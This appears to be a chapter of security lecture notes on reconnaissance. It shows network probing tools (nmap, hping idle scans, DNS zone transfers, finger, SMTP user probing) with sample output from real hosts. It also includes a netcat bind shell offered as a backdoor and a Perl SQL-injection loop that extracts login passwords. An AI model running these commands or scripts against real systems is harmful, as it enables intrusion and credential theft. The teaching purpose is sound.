Next Previous Contents

3. Discovery

People generally want to protect

Correspondingly, attackers typically want to

However, usually there is an earlier stage, that of discovery. One wants to collect miscellaneous data about the company, the people employed, the computer systems, the operating systems, the means of communicating with the outside world, modem telephone numbers, computer IP addresses, DNS names, user names, etc.

Such information can for example be useful in a social engineering attack.

Also, various exploits work on certain versions of operating systems and system software, and it is good to be able to determine such versions prior to launching an attack, in order not to be too noisy.

Maybe it is not a company but certain technical infrastructure that one wants to attack. Do interesting things with cable modems, for example. Inside information is needed.

3.1 Tools

Lots of programs and services provide useful information. For example, consult the telephone directory.

People have been known to go dumpster diving to collect information about telephone switches. Discarded manuals, computer printouts, internal telephone directories..

Investigating a local machine is usually easy. Investigating remote machines is usually done via the internet.

Below a list of tools. A good (and probably more up-to-date) list is found at sectools.org.

ping

The utility ping sends one or more ICMP ECHO packets to a given host and times how long it takes before the echo arrives. Uses:

E.g.

% ping -c 1 www.whitehouse.gov
64 bytes from a213-93-127-168.deploy.akamaitechnologies.com (213.93.127.168): icmp_seq=1 ttl=250 time=7.22 ms
Typically a Unix-like system. In fact Linux (since May 2001); before that it ran Solaris (according to Netcraft).

traceroute

A utility that sends ping packets with varying TTL, and determines the hosts that reply with a TIME_EXCEEDED error message. This makes it possible to trace the path the packets follow.

# traceroute -m 11 foo.win.tue.nl
 1  a2000 (24.132.4.1)  7.777 ms   8.966 ms   9.538 ms
 2  pos12-6.am00rt04.brain.upc.nl (62.108.0.45)  8.412 ms   8.527 ms   8.484 ms
 3  srp8-0.am00rt02.brain.upc.nl (212.142.32.34)  8.478 ms   8.461 ms   8.746 ms
 4  srp0-0.am00rt06.brain.upc.nl (212.142.32.44)  8.417 ms   8.507 ms   8.501 ms
 5  nl-ams01a-rd1-pos-3-0.aorta.net (213.46.161.53)  8.425 ms   8.397 ms   8.341 ms
 6  nl-ams02a-rd1-10gige-7-0.aorta.net (213.46.161.58)  8.305 ms   8.280 ms   8.226 ms
 7  nl-ams04a-ri1-pos-6-0.aorta.net (213.46.161.62)  4.461 ms   4.424 ms   4.526 ms
 8  Gi5-1-3.BR2.Amsterdam1.surf.net (145.145.166.45)  4.511 ms   4.479 ms   4.424 ms
 9  PO12-0.CR1.Amsterdam1.surf.net (145.145.166.1)  5.999 ms   5.962 ms   5.932 ms
10  PO0-0.AR5.Eindhoven1.surf.net (145.145.162.10)  9.017 ms   9.238 ms   9.539 ms
11  tue-router.Customer.surf.net (145.145.12.2)  8.647 ms   8.608 ms   8.739 ms

The -m option limits the number of hops. Sometimes that is useful if one does not want the target computer to see that it is being looked at (and by whom).

Several websites allow one to do a traceroute from there. See e.g. ams-ix and easynews.com/trace.

arping

Similar to ping, but the protocol is not ICMP but ARP. It broadcasts a who-has packet and prints the answers. This is useful to map a local ethernet segment, e.g., when probing the setup of a cable modem. It can be used to confuse the ARP cache of the neighbours.

hping

Reminiscent of ping, but more powerful. Handles TCP (default), UDP, ICMP and raw IP. It sends packets with properties as specified on the command line, and reports on the replies. Very useful for firewall probing. (Run ethereal/wireshark at the same time, to see what is happening.)

The author is the inventor of blind or idle scanning, where one does a portscan of a target without ever sending a packet to the target that mentions our own address. The idea is to use an intermediate idle zombie running Windows as fake source, so that the target will send its reply (if any) to the zombie. If we send a SYN to the target and the port was closed, the target replies with a RST discarded by the zombie. If the port was open, the target replies with SYN+ACK and the zombie answers with a RST and increment its ID counter. Now inspect the ID counter of the zombie to see whether there was any reply, that is, whether the target's port was open.

# hping -c 1 zombie
HPING zombie (eth0 192.168.1.1): NO FLAGS are set, 40 headers + 0 data bytes
len=46 ip=192.168.1.1 ttl=64 DF id=37 sport=0 flags=RA seq=0 win=0 rtt=4.8 ms
# hping -c 1 -S target -a zombie -p 21
# hping -c 1 zombie
HPING zombie (eth0 192.168.1.1): NO FLAGS are set, 40 headers + 0 data bytes
len=46 ip=192.168.1.1 ttl=64 DF id=39 sport=0 flags=RA seq=0 win=0 rtt=4.8 ms
Nowadays this Idle Scan is implemented more conveniently as nmap -sI:
# nmap -PN -sI zombie target
Idle scan using zombie.
Interesting ports on target:
PORT    STATE SERVICE
111/tcp open  rpcbind
513/tcp open  login
514/tcp open  shell

nslookup

Interrogate a given DNS server (name server). Lookup the IP address given a hostname, or a hostname given an IP address. Also: list a given domain. Replaced by dig and host on recent Linux systems.

Lookup the IP address given a hostname:

% nslookup www.win.tue.nl
Server:  ns1.a2000.nl
Address:  62.108.1.65

Non-authoritative answer:
Name:    svwww2.win.tue.nl
Address:  131.155.70.190
Aliases:  www.win.tue.nl

Lookup a hostname given an IP address:

% nslookup 131.155.70.190
Server:  ns1.a2000.nl
Address:  62.108.1.65

Name:    svwww2.win.tue.nl
Address:  131.155.70.190

In the example below we first ask a random name server about the domain win.tue.nl. It replies and tells that the full truth can be obtained from some given servers. Then we switch to one of those as name server and repeat the question.

% nslookup
Default Server:  ns1.a2000.nl
Address:  62.108.1.65

> set q=any
> win.tue.nl.
Server:  ns1.a2000.nl
Address:  62.108.1.65

Non-authoritative answer:
win.tue.nl      preference = 100, mail exchanger = mailhost.tue.nl
win.tue.nl      preference = 100, mail exchanger = kweetal.tue.nl
win.tue.nl      nameserver = ns2.tue.nl
win.tue.nl      nameserver = svns1.win.tue.nl
win.tue.nl      nameserver = svns2.win.tue.nl
win.tue.nl      nameserver = tuegate.tue.nl

Authoritative answers can be found from:
win.tue.nl      nameserver = ns2.tue.nl
win.tue.nl      nameserver = svns1.win.tue.nl
win.tue.nl      nameserver = svns2.win.tue.nl
win.tue.nl      nameserver = tuegate.tue.nl
ns2.tue.nl      internet address = 131.155.3.3
svns1.win.tue.nl        internet address = 131.155.68.98
svns2.win.tue.nl        internet address = 131.155.68.97
tuegate.tue.nl  internet address = 131.155.2.3
> server ns2.tue.nl
Default Server:  ns2.tue.nl
Address:  131.155.3.3

> win.tue.nl.
Server:  ns2.tue.nl
Address:  131.155.3.3

win.tue.nl
        origin = svns2.win.tue.nl
        mail addr = dns_manager.win.tue.nl
        serial = 2003051301
        refresh = 21600 (6 hours)
        retry   = 3600 (1 hour)
        expire  = 1209600 (14 days)
        minimum ttl = 86400 (1 day)
win.tue.nl      preference = 100, mail exchanger = kweetal.tue.nl
win.tue.nl      preference = 100, mail exchanger = mailhost.tue.nl
win.tue.nl      nameserver = tuegate.tue.nl
win.tue.nl      nameserver = ns2.tue.nl
win.tue.nl      nameserver = svns1.win.tue.nl
win.tue.nl      nameserver = svns2.win.tue.nl
kweetal.tue.nl  internet address = 131.155.3.6
mailhost.tue.nl internet address = 131.155.2.7
ns2.tue.nl      internet address = 131.155.3.3
svns1.win.tue.nl        internet address = 131.155.68.98
svns2.win.tue.nl        internet address = 131.155.68.97
tuegate.tue.nl  internet address = 131.155.2.3
> ls -d win.tue.nl.
ls: connect: Connection timed out
*** Can't list domain win.tue.nl.: Unspecified error

Nowadays most name servers refuse to list the hosts in a given domain. It is a privacy/security risk.

dnsquery

Somewhat like nslookup. Not on my Linux machine.

host

Somewhat like nslookup.

% host www.win.tue.nl
www.win.tue.nl is a nickname for svwww2.win.tue.nl
svwww2.win.tue.nl has address 131.155.70.190
svwww2.win.tue.nl mail is handled (pri=100) by kweetal.tue.nl
svwww2.win.tue.nl mail is handled (pri=100) by mailhost.tue.nl
% host 131.155.70.190
Name: svwww2.win.tue.nl

dig

Somewhat like nslookup. Here the example of a zone transfer.

# dig @ns.NL.net. axfr daftrucks.com.

daftrucks.com.          86400   IN      SOA     ns.NL.net. hostmaster.daftrucks.com. 2003031300 28800 7200 604800 86400
daftrucks.com.          86400   IN      NS      ns.NL.net.
daftrucks.com.          86400   IN      NS      auth60.ns.nl.uu.net.
daftrucks.com.          86400   IN      MX      100 montgomery.daftrucks.com.
daftrucks.com.          86400   IN      MX      150 montykpn.daftrucks.com.
menhir.daftrucks.com.   86400   IN      A       195.109.63.2
montykpn.daftrucks.com. 86400   IN      A       193.173.48.130
dafwork.daftrucks.com.  86400   IN      A       195.109.63.59
trucklocator.daftrucks.com. 86400 IN    A       195.109.63.42
testtrucklocator.daftrucks.com. 86400 IN A      195.109.63.48
montgomery.daftrucks.com. 86400 IN      A       195.109.63.4
impact.daftrucks.com.   86400   IN      A       195.109.63.45
dealernet.daftrucks.com. 86400  IN      CNAME   impact.daftrucks.com.
tcms.daftrucks.com.     86400   IN      A       195.109.63.43
cms.daftrucks.com.      86400   IN      A       195.109.63.44
test.daftrucks.com.     86400   IN      A       195.109.63.48
test-dealernet.daftrucks.com. 86400 IN  CNAME   timpact.daftrucks.com.
www.daftrucks.com.      86400   IN      A       213.193.211.66
supplier.daftrucks.com. 86400   IN      A       195.109.63.54
tsupplier.daftrucks.com. 86400  IN      A       195.109.63.55
dafisp.daftrucks.com.   86400   IN      A       195.109.63.1
timpact.daftrucks.com.  86400   IN      A       195.109.63.35
*.daftrucks.com.        86400   IN      MX      100 montgomery.daftrucks.com.
*.daftrucks.com.        86400   IN      MX      150 montykpn.daftrucks.com.

daftrucks.com.          86400   IN      SOA     ns.NL.net. hostmaster.daftrucks.com. 2003031300 28800 7200 604800 86400

(A very similar output is obtained from host -t axfr daftrucks.com. ns.NL.net.)

The request dig ns.nl any will report the name servers, mail hosts etc. of the ns.nl domain.

whois

Given a domain, list owner and contact information, and name servers. Given a host, give netblock information.

These days asking for info on .org domains seems to fail, but whois -h whois.pir.org ... works.

% whois nikhef.nl
   Domain name:
      nikhef.nl (first domain)

   Status: active

   Registrant:
      NIKHEF
      Kruislaan 409
      1098 SJ  AMSTERDAM
      Netherlands

   Administrative contact:
      Paul Kuipers
      +31 20 5925143
      [email protected]

   Registrar:
      SURFnet B.V.
      Radboudkwartier 273 
      3511 CK  UTRECHT
      Netherlands

   Domain nameservers:
      ajax.nikhef.nl       192.16.199.1
      leda.nikhef.nl       192.16.199.4
      dxmon.cern.ch        192.65.185.10
      ns.ripe.net          193.0.0.193

   Date first registered: 01-01-1980
   Record last updated: 19-03-2002
   Record maintained by: NL Domain Registry

and

% whois 192.16.199.1

OrgName:    Science Park Watergraafsmeer 
OrgID:      SPW
Address:    Kruislaan 407-415
Address:     Amsterdam
City:       
StateProv:  
PostalCode: 
Country:    NL

NetRange:   192.16.199.0 - 192.16.199.255 
CIDR:       192.16.199.0/24 
NetName:    HEFNET
NetHandle:  NET-192-16-199-0-1
Parent:     NET-192-0-0-0-0
NetType:    Direct Assignment
NameServer: AJAX.NIKHEF.NL
NameServer: LEDA.NIKHEF.NL
NameServer: NS.RIPE.NET
NameServer: DXMON.CERN.CH
Comment:    
RegDate:    1986-11-07
Updated:    2000-12-26

TechHandle: PK339-ARIN
TechName:   Kuipers, Paul 
TechPhone:  +31 20 5925143
TechEmail:  [email protected] 

finger

Finger is a well-known Unix service. It runs on TCP or UDP port 79. (For the protocol, see RFC 1288.)

Ask who is logged in (on a remote Unix system), and how long they've been inactive. This service is usually switched off. In the good old days finger [email protected] would tell about someone, and finger @host would tell about everybody. An easy way to get usernames.

The Morris worm exploited a buffer overflow in the finger daemon.

Nobody who values security will run fingerd. I tried a few dozen machines and did not find one that answered a finger request. Well, one:

%  finger @www.chemie.fu-berlin.de
[www.chemie.fu-berlin.de/160.45.22.11]
Login    Name                   TTY Idle When       Office
kirste   Burkhard Kirste       q0    39 Mon 14:38  Organik     838-56484
www      Web-Admin FUB-ChemNe  q1    39 Mon 14:39 
%

The original finger daemon allows a multihop target like [email protected]@siteB, where the finger daemon at siteB does the fingering of siteA. This can be used to hide the identity of the fingering host, or to penetrate a badly configured firewall.

If the siteA string is empty, it is taken to be the local machine. A target like @@@@@@@@@@@@@@@@@@@@@@@@@victim would cause high load by recursive finger invocations, and could be used to contribute to a DOS attack. Michael H. Warfield reports that in a SUN NIS environment it is easy to kill a network using finger.

GNU finger does not do this forwarding.

Some Solaris finger versions have a bug that will cause it to list all unused accounts:

% finger [email protected]
[www.chemie.fu-berlin.de/160.45.22.11]
Login name: babu                        In real life: Babu A Manjasetty
Phone: 6392 4920
Directory: /user/babu                   Shell: /bin/tcsh
Never logged in.
No Plan.

Login name: vae                         In real life: Prof. Volker A. Erdmann
Office: Biochemie, 838 56002
Directory: /user/vae                    Shell: /bin/tcsh
Never logged in.
No Plan.
...
Login name: kisslegg                    In real life: A. Wagner
Directory: /user/kisslegg               Shell: /bin/tcsh
Never logged in.
Plan:

                   Wer ist denn hier schon wieder neugierig ?     
...
% finger 'a b c d e f g [email protected]
[mail.irtemp.na.cnr.it/140.164.20.20]
Login       Name               TTY         Idle    When    Where
root     Super-User            console     9:19 Fri 12:48  :0                  
root     Super-User            pts/3       9:20 Fri 12:49  :0.0                
daemon          ???                         < .  .  .  . >
bin             ???                         < .  .  .  . >
sys             ???                         < .  .  .  . >
adm      Admin                              < .  .  .  . >
lp       Line Printer Admin                 < .  .  .  . >
uucp     uucp Admin                         < .  .  .  . >
nuucp    uucp Admin                         < .  .  .  . >
listen   Network Admin                      < .  .  .  . >
nobody   Nobody                             < .  .  .  . >
noaccess No Access User                     < .  .  .  . >
nobody4  SunOS 4.x Nobody                   < .  .  .  . >
esca            ???            pts/0        <Jul 23, 2002> documen.irtemp.n    
ilv             ???            9            <Nov 14, 2000> aux.irtemp.na.cn    
musto           ???                         < .  .  .  . >
luc             ???            9            <May 31, 2001> nemesis.irtemp.n    
director        ???                         < .  .  .  . >
graph           ???                         < .  .  .  . >
...
In this last example, we got a list of all users, together with the times of last login, and from which remote machine.

There have been times where also local use was useful: if finger runs as root, and one does not have read permission for some local file, make .plan a symlink to it, and let finger report the contents.

FreeBSD 4.1.1 allowed one to remotely read arbitrary files, using e.g. finger [email protected].

As an aside: the main use of finger in the Linux world today is to distribute a different kind of information.

% finger @kernel.org
[kernel.org/204.152.189.116]
The latest stable version of the Linux kernel is:           2.6.5
The latest 2.4 version of the Linux kernel is:              2.4.25
The latest prepatch for the 2.4 Linux kernel tree is:       2.4.26-rc2
The latest 2.2 version of the Linux kernel is:              2.2.26
The latest prepatch for the 2.2 Linux kernel tree is:       2.2.27-pre1
The latest 2.0 version of the Linux kernel is:              2.0.40
The latest -mm patch to the stable Linux kernels is:        2.6.5-mm3
%

nmap

nmap is a very useful utility that maps open ports and tries to determine the operating system, given the details of the returned IP packets. It is available on Unix-like systems (including MaxOS X) and Windows.

As the man page says: Nmap is designed to allow system administrators and curious individuals to scan large networks to determine which hosts are up and what services they are offering.

# nmap -O www.chemie.fu-berlin.de
Interesting ports on ester.chemie.fu-berlin.de (160.45.22.11):
(The 1547 ports scanned but not shown below are in state: closed)
Port       State       Service
1/tcp      filtered    tcpmux                  
7/tcp      filtered    echo                    
9/tcp      open        discard                 
13/tcp     open        daytime                 
19/tcp     filtered    chargen                 
21/tcp     filtered    ftp                     
22/tcp     open        ssh                     
23/tcp     filtered    telnet                  
25/tcp     filtered    smtp                    
37/tcp     open        time                    
53/tcp     filtered    domain                  
69/tcp     filtered    tftp                    
79/tcp     open        finger                  
80/tcp     open        http                    
111/tcp    filtered    sunrpc                  
113/tcp    open        auth                    
123/tcp    filtered    ntp                     
135/tcp    filtered    loc-srv                 
137/tcp    filtered    netbios-ns              
138/tcp    filtered    netbios-dgm             
139/tcp    filtered    netbios-ssn             
161/tcp    filtered    snmp                    
162/tcp    filtered    snmptrap                
199/tcp    open        smux                    
389/tcp    filtered    ldap                    
445/tcp    filtered    microsoft-ds            
464/tcp    filtered    kpasswd5                
512/tcp    open        exec                    
513/tcp    filtered    login                   
514/tcp    filtered    shell                   
515/tcp    filtered    printer                 
616/tcp    filtered    unknown                 
636/tcp    filtered    ldapssl                 
815/tcp    open        unknown                 
848/tcp    open        unknown                 
1024/tcp   open        kdm                     
1025/tcp   open        NFS-or-IIS              
1026/tcp   open        LSA-or-nterm            
1027/tcp   open        IIS                     
1029/tcp   open        ms-lsa                  
1433/tcp   filtered    ms-sql-s                
1434/tcp   filtered    ms-sql-m                
1455/tcp   open        esl-lm                  
1900/tcp   filtered    UPnP                    
1993/tcp   filtered    snmp-tcp-port           
2049/tcp   filtered    nfs                     
3306/tcp   filtered    mysql                   
4321/tcp   open        rwhois                  
5000/tcp   filtered    UPnP                    
5232/tcp   open        sgi-dgl                 
6000/tcp   open        X11                     
13720/tcp  filtered    VeritasNetbackup        
13782/tcp  filtered    VeritasNetbackup        
13783/tcp  filtered    VeritasNetbackup        
Remote operating system guess: IRIX 6.5-6.5.15m
Uptime 167.408 days (since Tue Nov 12 10:55:21 2002)

Nmap run completed -- 1 IP address (1 host up) scanned in 16 seconds

To check all TCP ports, try nmap -sT -p 1- host. See nmap(1).

Note: nmap sees the combined effect of all intermediate machines. So if some port is filtered, that may be the result of provider filtering. For example, I think that my provider filters ports 135, 137, 138, 139 and 445.

xprobe

Probing by nmap is a bit slow, a bit noisy, and uses strict matches with a fingerprint database. It can easily be fooled when the sysadmin changes some settings away from the defaults, or when some firewall rewrites packets. The program xprobe uses fuzzy matching, and is intended to be faster and more quiet. Of course, the result is much less precise.

# xprobe2 www.whitehouse.gov

XProbe2 v.0.1 Copyright (c) 2002-2003 [email protected], [email protected]
...
[+] Host: 213.93.127.168 is up (Guess probability: 100%)
[+] Target: 213.93.127.168 is alive
[+] Primary guess:
[+] Host 213.93.127.168 Running OS: "Linux Kernel 2.4.5 and above" (Guess probability: 100%)
[+] Other guesses:
[+] Host 213.93.127.168 Running OS: "Linux Kernel 2.2.x" (Guess probability: 100%)
[+] Host 213.93.127.168 Running OS: "NetBSD 1.6" (Guess probability: 91%)
[+] Host 213.93.127.168 Running OS: "Linux Kernel 2.4.0 - 2.4.4" (Guess probability: 87%)
[+] Host 213.93.127.168 Running OS: "OpenBSD 2.5" (Guess probability: 87%)
...

That was a successful example. Looking at my ADSL modem:

# nmap -O 10.0.0.138
...
Remote operating system guess: Alcaltel Speed Touch ADSL modem or router
# xprobe2 10.0.0.138
...
Primary guess:
Host 10.0.0.138 Running OS: "Sun Solaris (SunOS 2.*)" (Guess probability: 91%)

This shows that nmap has a much more extensive database.

I also tried xprobe2 v.0.2.2 and it didnt work at all on a recent Linux system. Still have to investigate why not.

p0f

p0f is a passive OS fingerprinter. It does not send packets but sits and listens to remote connections and reports.

# p0f 
p0f - passive os fingerprinting utility, version 2.0.3
(C) M. Zalewski <[email protected]>, W. Stearns <[email protected]>
p0f: listening (SYN) on 'eth3', 206 sigs (12 generic), rule: 'all'.
221.127.162.117:3561 - Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222) 
  -> 10.0.0.1:9898 (distance 16, link: IPv6/IPIP)
80.57.172.116:1357 - Windows XP Pro SP1, 2000 SP3 
  -> 10.0.0.1:2745 (distance 6, link: ethernet/modem)

telnet

One can use telnet to make a connection to a given port "by hand", maybe in order to look at the returned banner, or in order to type some commands.

% telnet www.chemie.fu-berlin.de 80
Trying 160.45.22.11...
Connected to www.chemie.fu-berlin.de.
Escape character is '^]'.
GET / HTTP/1.0

HTTP/1.1 200 OK
Date: Mon, 28 Apr 2003 20:10:27 GMT
Server: Apache/1.3.26 (Unix)
Last-Modified: Thu, 17 Apr 2003 16:15:26 GMT
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 extended 961018//EN">
...

Here we see that this system (possibly an IRIX 6.5 system according to nmap) says that it is running Apache/1.3.26 (Unix). Nowadays many sites share a single IP address, and the IP address no longer suffices to indicate what web page is needed. Therefore HTTP/1.0 often fails to work and HTTP/1.1 is required:

GET / HTTP/1.1
Host: foo.org

rpcinfo

The program rpcinfo will tell what RPC (remote procedure call) facilities are running on a given host. For example,

% /usr/sbin/rpcinfo -p 131.155.69.253
   program vers proto   port
    100000    2   tcp    111  portmapper
    100000    2   udp    111  portmapper
    100007    2   udp    767  ypbind
    100003    2   udp   2049  nfs
    100003    3   udp   2049  nfs
    100003    2   tcp   2049  nfs
    100003    3   tcp   2049  nfs
    100024    1   udp    800  status
    100024    1   tcp    802  status
    100021    1   udp   2049  nlockmgr
    100021    3   udp   2049  nlockmgr
    100021    4   udp   2049  nlockmgr
    100021    1   tcp   2049  nlockmgr
    100021    3   tcp   2049  nlockmgr
    100021    4   tcp   2049  nlockmgr
    100099    1   udp   2048
    100005    1   tcp   1024  mountd
    100005    3   tcp   1024  mountd
    100005    1   udp   1027  mountd
    100005    3   udp   1027  mountd
    391004    1   tcp   1025
    391004    1   udp   1028
    390113    1   tcp   7937
    391017    1   tcp    851
%

This is an IRIS 6.5.15m machine according to nmap.

Program 100099 is autofsd. Program 390113 is nsrexec. Program 391004 is sgi_mountd. Program 391017 is sgi_mediad. In this particular case we hoped to find program 391016, sgi_xfsmd for which there is a remote root exploit, but the sysadm was wise enough to disable it.

Here the RPC program numbers are well-known, but the port numbers can vary. The neighbouring machine 131.155.69.254 has precisely the same setup, but ypbind is on udp port 776, status is on ports 809, 811, mountd is on udp port 1026, sgi_mountd lives on udp port 1027, and sgi_mediad on tcp port 766.

X

An open X port (with an unprotected X server behind it) means that one can do everything on the remote machine that the logged in person can. Amuse or scare people with xeyes or so. Use xwd -root -silent -display machine:0 to make a copy of their screen. Use xmodmap to interchange the A and B on their keyboard. Read every keystroke. Etc.

There are various ways of protecting oneself. See xauth and xhost.

But then, still an X server that is visible to the outside is a security hole.

smtp

Long ago there were sendmail implementations that were distributed with the DEBUG command enabled. (This was one of the means of propagation of the Morris worm.) Those days are past. The EXPN command could be used to see the expansion of addresses - sometimes interesting as a way to get the list of user names belonging to some general alias like staff, or a way to see what mail handling scripts were invoked. It is almost always disabled. The VRFY command could be used to verify that a given address is legal - possibly a fast way of testing for the existence of given user names. It doesn't work any longer. Some sendmails were willing to send mail to arbitrary places, but open relays are good for spammers, and sendmails are more strict today. And thus:

% telnet mail.fu-berlin.de. 25
Trying 160.45.11.165...
Connected to mail.fu-berlin.de..
Escape character is '^]'.
220 mail.fu-berlin.de Smail3.2.0.98 ready at Mon, 28 Apr 2003 23:58:07 +0200 (MEST)
help
250-The following SMTP commands are recognized:
250-
250-   HELO hostname                   - startup and give your hostname
250-   EHLO hostname                   - startup with extension info
250-   MAIL FROM:<sender-address>      - start transaction from sender
250-   RCPT TO:<recipient-address>     - name recipient for message
250-   VRFY <address>                  - verify deliverability of address
250-   EXPN <address>                  - expand mailing list address
250-   DATA                            - start text of mail message
250-   RSET                            - reset state, drop transaction
250-   NOOP                            - do nothing
250-   DEBUG [level]                   - set debugging level, default 1
250-   HELP                            - produce this help message
250-   QUIT                            - close SMTP connection
250-
250-The normal sequence of events in sending a message is to state the
250-sender address with a MAIL FROM command, give the recipients with
250-as many RCPT TO commands as are required (one address per command)
250-and then to specify the mail message text after the DATA command.
250 Multiple messages may be specified.  End the last one with a QUIT.
helo aeb.aeb.nl
250 mail.fu-berlin.de Hello aeb.aeb.nl
noop
250 Okay
debug
500 I hear you knocking, but you can't come in
expn [email protected]
502 Command disabled
vrfy [email protected]
252 Cannot VRFY user, but will take message for this user and attempt delivery.
mail from:[email protected]
250 [email protected] ... Sender Okay
rcpt to:[email protected]
551 [email protected]' <[email protected]> not matched: (ERR_104) security violation: remote address not permitted.
rset
250 Reset state
quit
221 mail.fu-berlin.de closing connection
Connection closed by foreign host.

On the other hand, testing for users is not difficult today:

% telnet irtfweb.ifa.hawaii.edu 25
Trying 128.171.165.5...
Connected to irtfweb.ifa.hawaii.edu.
Escape character is '^]'.
220 ****************************************************************2******200*********2***000 *****
helo xxx.xxx.xx
250 irtfweb.ifa.hawaii.edu Hello xxx.xxx.xx, pleased to meet you
mail from:[email protected]
250 2.1.0 [email protected].. Sender ok
rcpt to:denault
250 2.1.5 denault... Recipient ok
data
354 Enter mail, end with "." on a line by itself
your passwd is zzzzzz
.
250 2.0.0 i1LNZ3i26566 Message accepted for delivery
mail from:[email protected]
250 2.1.0 [email protected].. Sender ok
rcpt to:napoleon
550 5.1.1 napoleon... User unknown
quit
221 2.0.0 irtfweb.ifa.hawaii.edu closing connection
Connection closed by foreign host.

Exercise Use dig or so to find the mail server for the fu-berlin.de domain.

Exercise Write a small script to send mail with faked sender address.

Exercise What was the password of [email protected]?

Packet sniffers

A packet sniffer captures packets at some network interface. The classical situation is the ethernet interface. Today there also is WiFi.

Sniffing allows one to capture all traffic on many local area networks. In particular, one can sniff rlogin, telnet, ftp and similar login sequences and sessions. One may have to be root on the local machine in order to set the interface to promiscuous mode.

Sometimes it is possible to detect a careless sniffer from the sequence of DNS reverse lookups sent out (to decode network addresses into domain.host form). Send out an IP packet to a nonexistent host using a nonexistent MAC address. If a DNS reverse lookup follows, then the packet was sniffed. (That may be good to know - some sniffers are vulnerable to a buffer overflow, so being sniffed may offer the opportunity to crack the sniffing box.)

Examples of sniffers are tcpdump, ethereal, ettercap, snoop (on Solaris), sniffit, snort, karpski all on Unix-like machines, and lots of others for a Windows environment. DOS has Sniffer Network Analyzer.

tcpdump

The utility tcpdump prints the headers (and with -X also the start of the contents) of packets on a given network interface. One of the options is to write all data to file and analyze later. The command tcpdump -w - writes to stdout. The -s option is used to increase the amount of content that is captured.

ethereal / wireshark

The utility ethereal is a much improved version of tcpdump. It allows one to capture traffic and write it to file, and to show selected parts of the traffic. It comes with a very nice, easy to use, GUI. The invocation ethereal -S -k -l starts capturing immediately, and shows the results in a scrolling window. Since 2006 it is called wireshark.

tethereal

And tethereal is the non-GUI version of ethereal.

Exercise How does one tell tcpdump and ethereal not to send out reverse DNS requests?

nc (netcat)

Netcat is a simple and very useful tool for doing TCP/UDP things manually (or from a shell script). See nc(1).

For example, when you see lots of connection attempts to port 3127 and you wonder what it is that knocks, then

% netcat -l -p 3127 > mydoom.nc
will capture input from there.

Netcat can be used to replace telnet - it is binary transparent.

Netcat (when compiled with -DGAPING_SECURITY_HOLE) can be used to make local programs or services available remotely. E.g. locally:

% nc -l -p 9876 -e /bin/sh
will leave a passwordless shell listening at port 9876, and now remote commands can be executed after connecting with
% nc 123.123.123.123 9876
Good for leaving a backdoor. See also nc_usage.html and netcat_tutorial.pdf.

(The shell we got is noninteractive, and hence does not prompt. To get an interactive shell we need the -i argument, but netcat does not allow command arguments. The solution is to write the 2-line wrapper C program or shell script, and invoke that instead. E.g.,

% cat mysh.c
#include <unistd.h>
int main() { return execl("/bin/sh", "sh", "-i", NULL); }
% cat mysh.sh
#!/bin/sh
exec /bin/sh -i

.) There are also cryptcat (netcat with Twofish-encrypted communication) and socat (a greatly extended version of netcat).

wget

Wget is a simple tool for downloading web pages or trees. If you point a browser at an address, it may execute commands found on the page, be redirected, etc. But wget just gives you the data. If the server requires certain cookies, a convenient approach is to go to the site with a browser such as firefox, find the cookies in the Show Cookies dialog of the browser, store them in a file cookies.txt and invoke wget --load-cookies cookies.txt. For example, the cookies name=value and name2=value2 can be stored like this:

% cat cookies.txt
some.site:port  FALSE   /       FALSE   0       name    value
some.other.site FALSE   /       FALSE   0       name2   value2

Exercise What is the meaning of the seven fields of a cookies.txt line?

For looking at web pages from the command line, also lynx -source 'url' is often useful. It prints to stdout. Or use curl.

curl

Curl also is a simple tool for uploading or downloading stuff. It doesn't do recursive downloads, but speaks many protocols, while wget only does http and ftp.

% curl -s -i http://www.cwi.nl/~aeb/
HTTP/1.1 301 Moved Permanently
Date: Tue, 1 Apr 2003 20:00:00 GMT
Server: Apache
Location: http://homepages.cwi.nl/~aeb/
Content-Length: 297
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://homepages.cwi.nl/~aeb/">here</a>.</p>
<hr>
<address>Apache Server at www.cwi.nl Port 80</address>
</body></html>
%

perl

If a conversation with the remote host is required, perl or python or ruby can be useful. For example, with perl a small loop produced all login passwords at a certain site:

#!/usr/bin/perl
require HTTP::Request;
require LWP::UserAgent;
use HTTP::Request::Common;

$ua = LWP::UserAgent->new;

$head = "xx' UNION (SELECT ..., PASSWORD, ... FROM ... WHERE USER_ID = ";
$tail = " ) UNION SELECT ... WHERE USER_NAME = 'xx";

for ($i = 1; $i < 1000; $i ++) {
    $name = $head . $i . $tail;

    $response = $ua->request(POST 'http://somesite.nl/path/login.asp',
             [ Method_Type => 'login',
               Name => $name,
               Password => '' ]);

    $rs = $response->as_string;
    $rs =~ m:.*<b>(.*)</b>.*:;
    print $i . ":\t" . $1 . "\n";
}

(The SQL injection produced a page containing the desired password in bold. The last few lines extract and print that part.)

John the Ripper

Having found some password hashes, john is a very good utility to crack them. Nowadays one also has oclhashcat that uses the GPU of a graphics card.

A browser

Browsers like lynx, netscape, opera, mozilla etc., are very useful on the one hand to probe properties of a certain web server, and on the other hand just to find information. One can use Google cache to find stuff that disappeared recently from the web.

Big Brother An example of the use of a browser: A recent Phrack issue discussed the remote administration utility "Big Brother". It makes system status visible on the web. Very convenient for the system administrator, but also useful for people collecting information. I just looked at http://cust.89.58.adsl.cistron.nl:81/bb/bb.html and pressing the procs button for one of these servers shows

  identd =0 - not running 
  inetd =0 - not running 
  cron >=1 - 1 instance running 
  sshd >=1 - 1 instance running 
  httpd >=1 - 7 instances running 
  l390 (>=9) - 11 instances running 
  nfsd >=1 - 4 instances running 
  mkweboper (1) - 1 instance running 
  smbd >=1 - 1 instance running 
  xntpd >=1 - 4 instances running 
  hercules (>=9) - 11 instances running 
Yes, it tells us precisely what services this server is running. Try also http://test.net.upc.nl/bb/.

URL diving Search machines like Google access the part of the web that is linked to from elsewhere. Often there are small islands not yet connected to the web, and search machines won't find them. One can guess a URL, and find the specs of an unreleased product or so.

